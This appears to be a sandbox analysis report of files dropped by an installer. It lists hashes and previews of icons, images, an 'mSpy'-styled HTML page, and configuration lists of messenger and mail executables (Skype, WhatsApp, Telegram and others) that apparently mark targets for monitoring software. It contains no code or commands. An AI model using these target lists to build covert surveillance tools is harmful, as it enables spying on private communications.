                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):0.6322026813246273
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:suE555L555L555L555L55r55r55r555r55r555r555r555r555r555r555r55r5I:suvzPFV5
                                                                                                                                                                                                                                                          MD5:E91EE031E8A775B87A966821F46B8003
                                                                                                                                                                                                                                                          SHA1:B093537BEB4335E306C870ECF6C8C1431279F262
                                                                                                                                                                                                                                                          SHA-256:E01B114837D5A19D2AB3492279F6AA0EA6AB960C4FFEB8369BB1A85F18672337
                                                                                                                                                                                                                                                          SHA-512:70D2E0F656E784A10505BF73568E9BA0329EF612512B62458F3C2A6A44B3E09DF0D18D8B481978C9974A54844C7E67B0D94A56FB0FBCA616A95F21D89F6882F0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.07531325717377
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:n2to4hDDD+l6ZtQE1mA/+PWLlClkKAUqjcVGTJUysHFa/IJu:2tthDDal6LL+PWQSB6sTqysHFaQJu
                                                                                                                                                                                                                                                          MD5:D0D41AD531613F51005CFDD6E7AFC134
                                                                                                                                                                                                                                                          SHA1:828A3A01B74603403798155326286743F5E4000C
                                                                                                                                                                                                                                                          SHA-256:0E43F7B2B24A035112F9FACD840EF0856F68260BA890CA1EDD7FF7B4A1DD3036
                                                                                                                                                                                                                                                          SHA-512:3471310FDE5E1341FD75B69C5271B15B385885E90A277E90F989D75638CCCA63E1E04BF4574E2610B24AC16BD0C04113EFC15E5B2A25EBC94191845BD03E8F44
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................RRR.VWW.}...ccd.ccd.~...dee.-...............................................................................................qrr.))).....................................................................................................................PRR.]__.'''.9;:.?CA.<>=.<?=.@CA.011....%uxx.............................................................................................wxw.........................NOO.................TTT.BBB.;;;.........................................JJJ.HHH.OOO=eee.TSS.ZYY+433.........`.y.E.e.F.f.Y.v.................bbb.[[Z....O.......................................................................2...........0...%...'...+...........2...4........XXX.....xxx.............................................................lll....F........1...7...8...............Y............ppp.....ccc.........................\\\.ttt.nnn.non.ddc.rrr...............
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.980115331909525
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:zCCCPJgo7qkfGEEEEEEEEEE1vt9COYNybhh3cGcm:O1So7qkf8zyNw33P
                                                                                                                                                                                                                                                          MD5:6447AACD6C19A9D3F0CDB2322620997A
                                                                                                                                                                                                                                                          SHA1:DECED599496691BB5403D8CAA063227181400DED
                                                                                                                                                                                                                                                          SHA-256:B5D3DDED1F4C3F75C033E19008119BC8E283DE10BBBCE39488854028C54511ED
                                                                                                                                                                                                                                                          SHA-512:91942D1C960B176BCA722CB5AF08B38A0072B789EC9E8B75236662BD69418251FBC1A30A41FD1FE0264CA34934608989AD441E728972F1E389CDB3E30F9336FF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .................................................................................................................................................................................................................................................................................................................................................../..?..?../............................o...................................................................................................................?.............................................................................................................?......................................o...........................................................................................................................................................................o........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.943764396001677
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:LvIxIlvIfcPp3sOHG3cj4D0oT9wgXXXXXXDpXXXXXXDBXXXXXX5vXXXXj9FLXo4O:LvIxIlvIEx3rHb4D0WpZYO2B
                                                                                                                                                                                                                                                          MD5:0075259CD4B132A02EB69CA2D82B1021
                                                                                                                                                                                                                                                          SHA1:D0F009D16495A8480891E0BB1F4D9EF7DFC96B18
                                                                                                                                                                                                                                                          SHA-256:EF6FF1A4B4740C8BA8817D625895D36DDD386C051B798A210EA9B59F68BBAEB7
                                                                                                                                                                                                                                                          SHA-512:2803475A5F0E2B277A022DA9122B6AF5BD1EA8F663C77F39FD2EF739729721A9ADA3B27DC50F8C37B959E45E9A78F8675BB6EDE9AFE77AFCF6DBB54B8D6D3A78
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ................................................................................'...,...1...1...,...'...............................................................................................1...\.................................\...1...........................................................................6...........................................................6...........................................................(...m.................................................................m...(....................................................................................................................................................................................................sA..m9..................E...Q.................................................................(...........................b)..Z...Z...Z.......................<.................................(...........................m..........................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.548751958766154
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:I36IcaNTUkY37c3Yd/oB3cEYp2LctCWZhlt9b7Q01iEtcm:I39NART/EshwaCOLfQmdth
                                                                                                                                                                                                                                                          MD5:3FF113ABAD7A9C6F2AE88B1680E5DE0E
                                                                                                                                                                                                                                                          SHA1:840BDB6139021E1FE655C240324A64481BB999FF
                                                                                                                                                                                                                                                          SHA-256:57EEA00C948FF2F8EE9604160F4143891E5F5792765961408CE99E68CAB04BB6
                                                                                                                                                                                                                                                          SHA-512:52B899DA820C3E3195799300122346B1A461B5139C213CEB8DED89734CDAD45878BE7E2B2F21AB5F9301CDABE6E2628571C9BB62923E318947FB41C0F2D78BF0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ....................................................................................................................................................................................................................................................*...*...%...................................................................................................#...G...d...|....962.:62.;73........]...6..."..."................................................................... .......5...n....gaZ..|.......................g`Y....K...........................................................................R...vnhb............................................PKEV...................................................................T-+(......................................................................................................................F.+).....................r.~.`...N.bN.`N.X\..sm.v...............}..............................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [Zoom]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):892
                                                                                                                                                                                                                                                          Entropy (8bit):5.034196121894832
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:0O8pqq2DktMmZFxw5vb6ocEzWSM90EeG3GjTA/nyeX+Nq7F21:VtjsWWTp2Ea8U
                                                                                                                                                                                                                                                          MD5:9D370AE1F35460B31952976C7E2AE06D
                                                                                                                                                                                                                                                          SHA1:51AB3EEB2789513AA9CB257C92B54E7CD3B9554E
                                                                                                                                                                                                                                                          SHA-256:2BBB1633EE6C1EC33FC7358C86A8C3293A199AB96E353336425DFE1023D0B597
                                                                                                                                                                                                                                                          SHA-512:F611550CFE595D3C7C8660ACC7E4B301A53E44751447CCD1F207B4BC9B498750B8400D8B44715FF3065ADECAC0D23CAB34C3325086E4F116A38DB532BDEA0AF6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Skype]..ID="skype.exe"..NodeID=41..[Zoom]..ID="Zoom.exe"..NodeID=73..[Telegram]..ID="telegram.exe"..NodeID=52..[Facebook Messenger]..ID="Messenger.exe"..NodeID=71..[Viber]..ID="viber.exe"..NodeID=50..[WhatsApp]..ID="whatsapp.exe"..NodeID=51..[Discord]..ID="Discord.exe"..NodeID=72..[Slack]..ID="slack.exe"..NodeID=70..[Microsoft Teams]..ID="Teams.exe"..NodeID=74..[Line]..ID="line.exe"..NodeID=58..[ICQ]..ID="icq.exe"..NodeID=39..[Google Talk]..ID="googletalk.exe"..NodeID=38..[Yahoo! Messenger]..ID="YahooMessenger.exe"..NodeID=40..[AIM]..ID="aim.exe"..NodeID=37..[Trillian]..ID="trillian.exe"..NodeID=42..[Windows Live Messenger]..ID="msnmsgr.exe"..NodeID=43..[Tencent QQ]..ID="QQ.exe"..NodeID=44..[QIP]..ID="qip.exe"..NodeID=45..; 47 48 - mobile..[Mail Agent]..ID="magent.exe"..NodeID=53..[Mozilla Thunderbird]..ID="thunderbird.exe"..NodeID=66..[Opera Mail]..ID="operamail.exe"..NodeID=67
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):234
                                                                                                                                                                                                                                                          Entropy (8bit):4.779626123051365
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:ok+vRlSyWL3eNmKRvsllLEJEEs1DqMVSO7DDlotFkMHPJn:EvRSDe7alnEyFSO5uLx
                                                                                                                                                                                                                                                          MD5:CD36DD43C387D31BE9DCDF92EB54972D
                                                                                                                                                                                                                                                          SHA1:A8A28D3A5BD6F747549C555D33FACC1A1B4B1CF9
                                                                                                                                                                                                                                                          SHA-256:CEC4B8CDA2278106D7107EF6663C2797FEE902ABAF7030FA6CDC1B8014A04C49
                                                                                                                                                                                                                                                          SHA-512:B696A1A1767F3EDBF5784433B735134366F7E6424F366F432852635BFABAC391BA46E07C0218B22BDA10C80E8710C4981F50328897FD7ACD440EC65274548B18
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Skype..Zoom..Telegram..Facebook Messenger..Viber..WhatsApp..Discord..Slack..Microsoft Teams..Line..ICQ..Google Talk..Yahoo! Messenger..AIM..Trillian..Windows Live Messenger..Tencent QQ..QIP..Mail Agent..Mozilla Thunderbird..Opera Mail
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [Zoom]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):892
                                                                                                                                                                                                                                                          Entropy (8bit):5.034196121894832
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:0O8pqq2DktMmZFxw5vb6ocEzWSM90EeG3GjTA/nyeX+Nq7F21:VtjsWWTp2Ea8U
                                                                                                                                                                                                                                                          MD5:9D370AE1F35460B31952976C7E2AE06D
                                                                                                                                                                                                                                                          SHA1:51AB3EEB2789513AA9CB257C92B54E7CD3B9554E
                                                                                                                                                                                                                                                          SHA-256:2BBB1633EE6C1EC33FC7358C86A8C3293A199AB96E353336425DFE1023D0B597
                                                                                                                                                                                                                                                          SHA-512:F611550CFE595D3C7C8660ACC7E4B301A53E44751447CCD1F207B4BC9B498750B8400D8B44715FF3065ADECAC0D23CAB34C3325086E4F116A38DB532BDEA0AF6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Skype]..ID="skype.exe"..NodeID=41..[Zoom]..ID="Zoom.exe"..NodeID=73..[Telegram]..ID="telegram.exe"..NodeID=52..[Facebook Messenger]..ID="Messenger.exe"..NodeID=71..[Viber]..ID="viber.exe"..NodeID=50..[WhatsApp]..ID="whatsapp.exe"..NodeID=51..[Discord]..ID="Discord.exe"..NodeID=72..[Slack]..ID="slack.exe"..NodeID=70..[Microsoft Teams]..ID="Teams.exe"..NodeID=74..[Line]..ID="line.exe"..NodeID=58..[ICQ]..ID="icq.exe"..NodeID=39..[Google Talk]..ID="googletalk.exe"..NodeID=38..[Yahoo! Messenger]..ID="YahooMessenger.exe"..NodeID=40..[AIM]..ID="aim.exe"..NodeID=37..[Trillian]..ID="trillian.exe"..NodeID=42..[Windows Live Messenger]..ID="msnmsgr.exe"..NodeID=43..[Tencent QQ]..ID="QQ.exe"..NodeID=44..[QIP]..ID="qip.exe"..NodeID=45..; 47 48 - mobile..[Mail Agent]..ID="magent.exe"..NodeID=53..[Mozilla Thunderbird]..ID="thunderbird.exe"..NodeID=66..[Opera Mail]..ID="operamail.exe"..NodeID=67
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):234
                                                                                                                                                                                                                                                          Entropy (8bit):4.779626123051365
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:ok+vRlSyWL3eNmKRvsllLEJEEs1DqMVSO7DDlotFkMHPJn:EvRSDe7alnEyFSO5uLx
                                                                                                                                                                                                                                                          MD5:CD36DD43C387D31BE9DCDF92EB54972D
                                                                                                                                                                                                                                                          SHA1:A8A28D3A5BD6F747549C555D33FACC1A1B4B1CF9
                                                                                                                                                                                                                                                          SHA-256:CEC4B8CDA2278106D7107EF6663C2797FEE902ABAF7030FA6CDC1B8014A04C49
                                                                                                                                                                                                                                                          SHA-512:B696A1A1767F3EDBF5784433B735134366F7E6424F366F432852635BFABAC391BA46E07C0218B22BDA10C80E8710C4981F50328897FD7ACD440EC65274548B18
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Skype..Zoom..Telegram..Facebook Messenger..Viber..WhatsApp..Discord..Slack..Microsoft Teams..Line..ICQ..Google Talk..Yahoo! Messenger..AIM..Trillian..Windows Live Messenger..Tencent QQ..QIP..Mail Agent..Mozilla Thunderbird..Opera Mail
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                          Entropy (8bit):4.608502996059392
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:yqy/nveX+vRo65zHyyWVovaBWU:ok+vRlSyWLh
                                                                                                                                                                                                                                                          MD5:DE0E549A26866981947B7D3653B50B52
                                                                                                                                                                                                                                                          SHA1:493223B85EB9A64FB6A7BF563FAF4E5102C6BBEC
                                                                                                                                                                                                                                                          SHA-256:92DA12EB285A3B9AAEC1D50DA7F17F325216FF874C72351D1811E367E190AF5A
                                                                                                                                                                                                                                                          SHA-512:D567E6694049647E2BE752D4FA13FA52F0409B9170617307F8B47FA132A5C7F276D2BCB3D5A6B50FCBF7A0A2AB6C77C5D38188C0B71249083DA57614A9550780
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Skype..Zoom..Telegram..Facebook Messenger..Viber..WhatsApp..Discord..QIP
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                          Entropy (8bit):4.608502996059392
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:yqy/nveX+vRo65zHyyWVovaBWU:ok+vRlSyWLh
                                                                                                                                                                                                                                                          MD5:DE0E549A26866981947B7D3653B50B52
                                                                                                                                                                                                                                                          SHA1:493223B85EB9A64FB6A7BF563FAF4E5102C6BBEC
                                                                                                                                                                                                                                                          SHA-256:92DA12EB285A3B9AAEC1D50DA7F17F325216FF874C72351D1811E367E190AF5A
                                                                                                                                                                                                                                                          SHA-512:D567E6694049647E2BE752D4FA13FA52F0409B9170617307F8B47FA132A5C7F276D2BCB3D5A6B50FCBF7A0A2AB6C77C5D38188C0B71249083DA57614A9550780
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Skype..Zoom..Telegram..Facebook Messenger..Viber..WhatsApp..Discord..QIP
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                          Entropy (8bit):4.150292659616668
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:yqyxATSfR6lLEJO:XblLEJO
                                                                                                                                                                                                                                                          MD5:A81D187F7CF46F4FC7336B86CBAEC37F
                                                                                                                                                                                                                                                          SHA1:7B0E93E0B0E167997960C23CCA5A75B051EB30E9
                                                                                                                                                                                                                                                          SHA-256:1231CA0960A50BFE65D8931A816737054757963C4C7CDE91B696E4C171B5D609
                                                                                                                                                                                                                                                          SHA-512:7F1A558A3F19C29093245687B1DE5A20CF63C6134DAFDF8EA9F64D7116B7F83B2996EF26AF6118AC8003DA954A5B1A99262D1F7D7062FC399302508487C31ACC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Skype..Tencent QQ..ICQ..Google Talk
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                          Entropy (8bit):4.150292659616668
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:yqyxATSfR6lLEJO:XblLEJO
                                                                                                                                                                                                                                                          MD5:A81D187F7CF46F4FC7336B86CBAEC37F
                                                                                                                                                                                                                                                          SHA1:7B0E93E0B0E167997960C23CCA5A75B051EB30E9
                                                                                                                                                                                                                                                          SHA-256:1231CA0960A50BFE65D8931A816737054757963C4C7CDE91B696E4C171B5D609
                                                                                                                                                                                                                                                          SHA-512:7F1A558A3F19C29093245687B1DE5A20CF63C6134DAFDF8EA9F64D7116B7F83B2996EF26AF6118AC8003DA954A5B1A99262D1F7D7062FC399302508487C31ACC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Skype..Tencent QQ..ICQ..Google Talk
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):12965
                                                                                                                                                                                                                                                          Entropy (8bit):4.7252821159716
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:fosFgDIOR12U81EfXbWtk4VAwvZRlppVLMQ:fos4II2U81EfLWtk4VAwvNpUQ
                                                                                                                                                                                                                                                          MD5:5EC6E79E4BA242B21EBD31F4EF89BEB8
                                                                                                                                                                                                                                                          SHA1:7D0202CC4739CFA0C8459E9347260F8F44DD72BF
                                                                                                                                                                                                                                                          SHA-256:1B7D810D6F1338C3D06A01E067E0F933319048A03CCA73DBEA955400216448A3
                                                                                                                                                                                                                                                          SHA-512:A4426BE8C9850D699EB3674B5A6C78E0E7666DB8BCC44D89FBA7D8D3158DE4E55548628318D13B35D7F8333C3237F1971750F46897448538F8AC7EDD4EFA985B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">..<link rel="stylesheet" type="text/css" href="mSpy/widgets.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/jquery-ui-1.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/reset.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/main.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/anythingslider.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/jquery.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/core-ui-select.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/jquery_002.css" media="all">..</head>..<body>.. <div class="std"><div class="wrapper">.. <div class="contentZone buyNowSection">.. <div class="product_page_wrap">.. <div class="product_page_top">..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36574
                                                                                                                                                                                                                                                          Entropy (8bit):7.983280552060311
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:3WN9F6pKVwko1aCYqIfw7dVCOyauFqRZd96/UCfD0J1RGz3/:3WDwc6kHYI47wqRzc/bfDG1RGj/
                                                                                                                                                                                                                                                          MD5:6013CCDC5004442BD8EB1EAEE1A2FDFE
                                                                                                                                                                                                                                                          SHA1:7447A346E5E2002E4EF6C56E149EB140ECC5F192
                                                                                                                                                                                                                                                          SHA-256:065857BDAEC7F2E73BA3F7B81D627B94794B67E35D62168F439200FC840412A5
                                                                                                                                                                                                                                                          SHA-512:2047C8F6BAFCC06124A2BD3776475B89C2470090DEB186AF88787E0AFA2DDC0462C70FEBF58ECED3F192E5DC918BE37F4A17EAAA63D337C8A176099F818F9A25
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...b...<.....-.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:557A66613F9D11E2B86C971723AA9104" xmpMM:DocumentID="xmp.did:557A66623F9D11E2B86C971723AA9104"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:557A665F3F9D11E2B86C971723AA9104" stRef:documentID="xmp.did:557A66603F9D11E2B86C971723AA9104"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>-2.....RIDATx..].x...~.eM...^....$.@.e.({..B...Z...~J[Z.-PJ[.t0...E.3.;v......=.c;.-[..$.........s.......'...7.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19730
                                                                                                                                                                                                                                                          Entropy (8bit):7.966645049778982
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:qJXE056Cv0Ek+u9AOgo8KWTVQSSKOhFjVdQO0MUCguUfrDlk0m0pe:q35fv0fjyKQQT4MyxrZwIe
                                                                                                                                                                                                                                                          MD5:31EC3A003CF3D2C1CDE419B2770AE700
                                                                                                                                                                                                                                                          SHA1:02927572E6B55561B729E37406C197BC782A5B08
                                                                                                                                                                                                                                                          SHA-256:F9050D57ED7DDF92CD1B92505BEB33A606EA90682AE918DF2464C0F4ECC8CBEA
                                                                                                                                                                                                                                                          SHA-512:646C7DEF65B4921CE55246D408348E10628B55FB4D5F920EE69CEC88F3F3C38BB1157C749CA4F0B13710AA431DFA4229E4D67380AF0A0FBF78A9958ACB739464
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......P...... %....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19730
                                                                                                                                                                                                                                                          Entropy (8bit):7.966645049778982
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:qJXE056Cv0Ek+u9AOgo8KWTVQSSKOhFjVdQO0MUCguUfrDlk0m0pe:q35fv0fjyKQQT4MyxrZwIe
                                                                                                                                                                                                                                                          MD5:31EC3A003CF3D2C1CDE419B2770AE700
                                                                                                                                                                                                                                                          SHA1:02927572E6B55561B729E37406C197BC782A5B08
